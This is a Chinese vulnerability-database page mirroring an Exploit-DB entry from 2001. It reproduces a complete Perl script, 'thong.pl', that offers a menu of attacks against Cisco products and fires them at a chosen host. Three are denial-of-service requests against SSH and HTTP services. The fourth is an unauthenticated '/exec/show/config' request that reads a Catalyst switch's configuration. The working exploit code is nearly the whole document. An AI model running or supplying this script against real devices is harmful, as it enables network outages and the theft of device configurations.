Cisco (Multiple Products) – Automated Tool-安全小百科

Cisco (Multiple Products) – Automated Tool

漏洞ID	1053517	漏洞类型
发布时间	2001-01-27	更新时间	2001-01-27
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Hardware	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/262

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

#!/usr/bin/perl
#
# Written by hypoclear - http://hypoclear.cjb.net
# Thong-th-thong-th-thong.pl AKA thong.pl is a PERL script 
# which automates several attacks against various Cisco products.  
# To be specific:
#
# 12-13-00 - Cisco Catalyst ssh Protocol Mismatch DoS Vulnerability
# 11-28-00 - Cisco 675 Web Administration Denial of Service Vulnerability
# 10-26-00 - Cisco Catalyst 3500 XL Remote Arbitrary Command
# 10-25-00 - Cisco IOS Software HTTP Request DoS Vulnerability 
#
#   usage: ./thong.pl -h <host>

use IO::Socket; use Getopt::Std;
getopts('h:');

if (defined $opt_h)
 {
  $HOST = $opt_h; 
  $PORT; 
  $STRING = ""; 
  $menu_opt = "";

  menu();
  computeOption();
  exploit();
 }

else {print "nn usage ./thong.pl -h <host>nn"}

sub menu 
{
  print "nn     DATE     VULNERABILITY
  1. 12-13-00 - Cisco Catalyst ssh Protocol Mismatch DoS Vulnerability
  2. 11-28-00 - Cisco 675 Web Administration Denial of Service Vulnerability
  3. 10-26-00 - Cisco Catalyst 3500 XL Remote Arbitrary Command
  4. 10-25-00 - Cisco IOS Software HTTP Request DoS Vulnerability  

  Enter Option: ";
  $menu_opt = <STDIN>;
  chomp ($menu_opt);
}

sub computeOption
{
  if    ($menu_opt == "1"){$PORT = 22; $STRING = "this ain't SSH";}
  elsif ($menu_opt == "2"){$PORT = 80; $STRING = "GET ? HTTP/1.0nn";}
  elsif ($menu_opt == "3"){$PORT = 80; three();}
  elsif ($menu_opt == "4"){$PORT = 80; $STRING = "GET /error?/ HTTP/1.0nn";}
  else  {print "Select a real option!n"; menu();}
}

sub three
{
  print "Enter file to read or enter D for default (/show/config/cr): ";
  $key = <STDIN>;
  chomp ($key);
  print "nGetting $key...";

  if (($key eq "D")||($key eq "d"))
  {
    print "nGetting /show/config/cr...n"; 
    $STRING = "GET /exec/show/config/cr HTTP/1.0nn";
  }
  else 
  {
    print "nGetting $key...n";
    $STRING = "GET /exec$key HTTP/1.0nn";
  }
}

sub exploit
{
  print "nntrying to exploit $HOST...n";
 
  $SOCKET = IO::Socket::INET->new(PeerAddr => $HOST,
                                  PeerPort => $PORT,
                                  Proto    => "tcp")
         || die "Couldn't connect to $HOSTn";

  print "n$STRINGn";
  print $SOCKET "$STRING";
 
  if ($menu_opt == 3){while (<$SOCKET>){print}}
  close($SOCKET);
}


# milw0rm.com [2001-01-27]

相关推荐: Sendmail拒绝服务漏洞

Sendmail拒绝服务漏洞漏洞ID 1207224 漏洞类型未知发布时间 1999-01-01 更新时间 1999-01-01 CVE编号 CVE-1999-0205 CNNVD-ID CNNVD-199901-008 漏洞平台 N/A CVSS评分 …

文章版权归作者所有，未经允许请勿转载。

THE END